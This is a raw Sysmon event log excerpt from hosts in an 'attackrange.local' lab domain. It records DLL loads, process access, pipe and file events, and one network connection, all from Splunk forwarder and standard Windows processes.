17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001530967Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001530966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001530965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001530964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001530963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001530962Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001530961Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001530960Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001530959Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001530958Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001530957Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001530956Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001530955Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001530954Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001530953Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001530952Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001530951Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001530950Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001530949Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001530948Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001530947Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001530946Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x80000000000000001530945Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001530944Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530943Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001530942Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001530941Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001530940Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x80000000000000001530939Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001530938Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001530937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.092{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001530936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001530934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001530932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x80000000000000001061171Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:27.056{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061170Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:27.056{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061175Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:28.165{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3637591B91CEAF5635A07D9B4A495D69,SHA256=379E49A1172A3D2530B4EC16C4F1343B8285B7D75AF0D70AF9533358B5B331A4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:28.096{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:28.096{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2260BB6C97FD98299A01487BD35029A4,SHA256=7F2E13A5E626B71ECAFC31F929E5620F9C3F005D836868D246FA0238D063AA3Ffalsefalse - insufficient disk space 10341000x80000000000000001061174Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:28.057{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061173Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:28.057{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061179Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:29.553{761B69BB-8200-607D-A100-00000000BA01}4148NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061178Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:29.171{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10ED6AD9CF4B5CC967C8482DDE26D8FF,SHA256=CB14B20C5E2AB16044E84B90850CED4333B2E642108F1DE6101954FF0A32C6F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001530993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.600{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64689-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001530992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:29.049{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:29.049{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB9E6ED731FED86068C068BE439E7CD,SHA256=5D9923DEA349E663A0A99BE6A3EC1BB463D0096ACC224ACEB6DFBD78D6DE71B1falsefalse - insufficient disk space 10341000x80000000000000001061177Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 